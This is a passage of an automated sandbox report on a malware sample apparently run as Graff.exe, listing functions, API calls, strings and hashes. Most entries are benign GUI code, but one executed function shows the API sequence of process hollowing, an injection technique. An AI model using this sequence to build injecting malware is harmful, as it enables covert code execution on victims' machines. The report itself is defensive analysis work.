Opcode ID: b10bd87f16d89a759ade0d579b1aa53bed7143e7d67141235de6010c6dea1b9f
Instruction ID: ad89877daec4e8685e03249741119c19306f216687ae543feb0344c0c5857f1f
Opcode Fuzzy Hash: b10bd87f16d89a759ade0d579b1aa53bed7143e7d67141235de6010c6dea1b9f
Instruction Fuzzy Hash: B731B234A55A88EFEB349A14CC09FE87765AB04394F58410EFA11962E1C7BEB9C09B41

Function 007C7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007C769A
GetWindowRect.USER32(?,?), ref: 007C7710
PtInRect.USER32(?,?,007C8B89), ref: 007C7720
MessageBeep.USER32(00000000), ref: 007C778C

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 76cd35a0e930c721b3d33f3fed3d261828b1c333ee44720c46176e338167e998
Instruction ID: 58f985cf083948a0295c1e3abc69e07d33335135bdf586c429993a15238f9afe
Opcode Fuzzy Hash: 76cd35a0e930c721b3d33f3fed3d261828b1c333ee44720c46176e338167e998
Instruction Fuzzy Hash: 05418D34605618DFCB45CF68C898FA9BBF5FB49314F5980ACE9149B261CB38E941CF90

Function 0079DF95 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00737620: _wcslen.LIBCMT ref: 00737625

_wcslen.LIBCMT ref: 0079DFCB
_wcslen.LIBCMT ref: 0079DFE2
_wcslen.LIBCMT ref: 0079E00D
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0079E018

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 6ea6b8c1882ce65f8ed982d7abac76b4ebbc02558c38b3e782ca4e3f0711843c
Instruction ID: 33423627a2405fceb42150140e9f4d95c3c58e6897c4c6162f409e0d0d89186b
Opcode Fuzzy Hash: 6ea6b8c1882ce65f8ed982d7abac76b4ebbc02558c38b3e782ca4e3f0711843c
Instruction Fuzzy Hash: CB21A171900214EFCB20DFA8D986BAEB7F8EF45750F254065E805BB246D7B89E41CBA1

Function 0073600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0073604C
GetStockObject.GDI32(00000011), ref: 00736060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0073606A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a840278b796aea172e3a25146cc26c63a869208f6224e35dbe083d7cde4a0c6f
Instruction ID: 9b544ffa04f4d4df6733cecfaa8d46ecf7aef244b8f1032d5c267fc4501639f2
Opcode Fuzzy Hash: a840278b796aea172e3a25146cc26c63a869208f6224e35dbe083d7cde4a0c6f
Instruction Fuzzy Hash: 04116D72501508BFEF164FA49C45EEABB69FF097A4F048215FA1852111D73ADC60DBA0

Function 00753B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00753B56

Part of subcall function 00753AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00753AD2
Part of subcall function 00753AA3: ___AdjustPointer.LIBCMT ref: 00753AED

_UnwindNestedFrames.LIBCMT ref: 00753B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00753B7C
CallCatchBlock.LIBVCRUNTIME ref: 00753BA4

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 45ccabbd83f7e12143afa76a70b89573a5c8cd9d370941e82f9d87e90ad2b638
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: A7012972100148BBDF125F95CC46EEB3B6AEF48799F044014FE4896121C77AE965DBA0

Function 007C7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007C7E33
ScreenToClient.USER32(?,?), ref: 007C7E4B
ScreenToClient.USER32(?,?), ref: 007C7E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 007C7E8A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ee0a98604b76a5ebac4a1fc24a7bfea8fbfacbb98c6220f4c117d6a79c9c3ab3
Instruction ID: b2609a672b517ef7b2679939ee8545954dd61010d57febf59c7810902f9484d5
Opcode Fuzzy Hash: ee0a98604b76a5ebac4a1fc24a7bfea8fbfacbb98c6220f4c117d6a79c9c3ab3
Instruction Fuzzy Hash: 621126B9D0024AAFDB41DF98C984AEEBBF5FF08310F50905AE915E3210D735AA55CF54

Function 007C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00749639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00749693
Part of subcall function 00749639: SelectObject.GDI32(?,00000000), ref: 007496A2
Part of subcall function 00749639: BeginPath.GDI32(?), ref: 007496B9
Part of subcall function 00749639: SelectObject.GDI32(?,00000000), ref: 007496E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007C8887
LineTo.GDI32(?,?,?), ref: 007C8894
EndPath.GDI32(?), ref: 007C88A4
StrokePath.GDI32(?), ref: 007C88B2

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9edfc8e4b219da9056707fe146e02b56cae647d718c53efa6bf044bf49475964
Instruction ID: a5846003ef7b8f82050ff2b42c817aab093c1172c0978df9cdb1193ef67453f5
Opcode Fuzzy Hash: 9edfc8e4b219da9056707fe146e02b56cae647d718c53efa6bf044bf49475964
Instruction Fuzzy Hash: 6EF03436041258FBEB136F94AC0EFDA3F69AF06320F448008FA55651E2C7B95561CBAA

Function 007498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007498CC
SetTextColor.GDI32(?,?), ref: 007498D6
SetBkMode.GDI32(?,00000001), ref: 007498E9
GetStockObject.GDI32(00000005), ref: 007498F1

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 40bfe173e7b1d12e9e7c3d182f883229e4eb18a1ad81d40991e19e9341c7c450
Instruction ID: e85c9b9c28adb8469e426966cf93f6bd114a53feeafbce98ed0b6afd0d37696c
Opcode Fuzzy Hash: 40bfe173e7b1d12e9e7c3d182f883229e4eb18a1ad81d40991e19e9341c7c450
Instruction Fuzzy Hash: 95E03931684284ABDB225B75BC09BE93B20AB52336F18C219F6BE980E1C37986509B10

Function 0074E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0074E1B1

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 63f547a4b1a0dcedf74df28d93393ea4c26d8014eb85aadb00fcd53ef1f7e67d
Instruction ID: 9ae48afa9b7ba15ed6fe01cb24f42728418f094146a56df903c6cc1ea132d702
Opcode Fuzzy Hash: 63f547a4b1a0dcedf74df28d93393ea4c26d8014eb85aadb00fcd53ef1f7e67d
Instruction Fuzzy Hash: 0B513435644246DFEB15EF28C485AFA7BA4FF16320F248059EC919B2D0D77C9D42CBA0

Function 0074F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0074F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0074F2BB

Strings

@, xrefs: 0074F2AF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: ba59a1f893d4269cf25f351ccc81ed4b7139cfec94884d350c91040aa0ad221d
Instruction ID: 0bd6ca4df8637cee711bf4f878b756cb80ec40fa8f7b916822b0d440d75cf113
Opcode Fuzzy Hash: ba59a1f893d4269cf25f351ccc81ed4b7139cfec94884d350c91040aa0ad221d
Instruction Fuzzy Hash: 185119724087499BE320AF10D88ABAFB7F8FB84300F81885DF1D951196EB759529CB66

Function 007B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?), ref: 007B57E0
_wcslen.LIBCMT ref: 007B57EC

Strings

CALLARGARRAY, xrefs: 007B57E6, 007B57EB

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: a9796c5eb3d3fa822fc2cf29d4024e1d4ec9db301bc4b1df251591a40803a46c
Instruction ID: 39a8b64ddf9ccc906f87604df8073c9b76a44501882c8ea1f6ce038ef61c7f4e
Opcode Fuzzy Hash: a9796c5eb3d3fa822fc2cf29d4024e1d4ec9db301bc4b1df251591a40803a46c
Instruction Fuzzy Hash: 61419F71E00209DFCB14DFA9C886AFEBBB5FF59324F144069E505A7252E7789D81CBA0

Function 00733923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007733A2

Part of subcall function 00736B57: _wcslen.LIBCMT ref: 00736B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00733A04

Strings

Line: , xrefs: 007733EB

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: e482db89627a3bf36677f0acfe55de3577ce26238fb5876abf47222b72b74ec8
Instruction ID: 1a56d842b2aac15dd91432ab15d0eb7d2c0edf6d0e7be175afb8e048ba6a63bd
Opcode Fuzzy Hash: e482db89627a3bf36677f0acfe55de3577ce26238fb5876abf47222b72b74ec8
Instruction Fuzzy Hash: 6731A571408304EAE775EB10DC49BEBB7D8AB40724F10851EF59992192DB7C9649C7D2

Function 00750D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0074F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00800A88,00000000,00800A74,00750D71,?,?,?,0073100A), ref: 0074F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0073100A), ref: 00750D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0073100A), ref: 00750D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00750D7F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: feca0395e9a1b6c2c8a898db6afd4b6dfa75f1c0c54de2423078802f0199a12b
Instruction ID: 5bc31643123bddbf2649cfb9bbe2c4a541a49ec748c0223c89e62c320ba0469c
Opcode Fuzzy Hash: feca0395e9a1b6c2c8a898db6afd4b6dfa75f1c0c54de2423078802f0199a12b
Instruction Fuzzy Hash: 26E06D702007418BE3619FB8D808B827BF0BF00751F00892DE886C6652DBFCE4488BD1

Analysis Process: Graff.exePID: 7792, Parent PID: 7660COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	99.5%
Signature Coverage:	1.7%
Total number of Nodes:	1521
Total number of Limit Nodes:	63

Executed Functions

Function 00417245 Relevance: 61.5, APIs: 29, Strings: 6, Instructions: 290
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
GetProcAddress.KERNEL32(00000000), ref: 0041728F
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
GetProcAddress.KERNEL32(00000000), ref: 004172A3
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
GetProcAddress.KERNEL32(00000000), ref: 004172B7
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
GetProcAddress.KERNEL32(00000000), ref: 004172CB
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
NtClose.NTDLL(?), ref: 0041744A
TerminateProcess.KERNEL32(?,00000000), ref: 00417454
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
ResumeThread.KERNEL32(?), ref: 00417582
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
GetCurrentProcess.KERNEL32(?), ref: 004175A5
NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
NtClose.NTDLL(?), ref: 004175B6
TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
GetLastError.KERNEL32 ref: 004175C7

Strings

ZwCreateSection, xrefs: 00417272
ZwUnmapViewOfSection, xrefs: 004172A5
ZwMapViewOfSection, xrefs: 00417291
`Mw, xrefs: 00417266
ZwClose, xrefs: 004172B9
ntdll, xrefs: 00417277, 00417296, 004172AA, 004172BE

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Mw$ntdll
API String ID: 3150337530-1701449367
Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

Function 00873170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0087316A,?,?), ref: 008731D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0087316A,?,?), ref: 00873204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00873227
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00873232
CreatePopupMenu.USER32 ref: 00873246
PostQuitMessage.USER32(00000000), ref: 00873267

Strings

TaskbarCreated, xrefs: 0087322D

Memory Dump Source

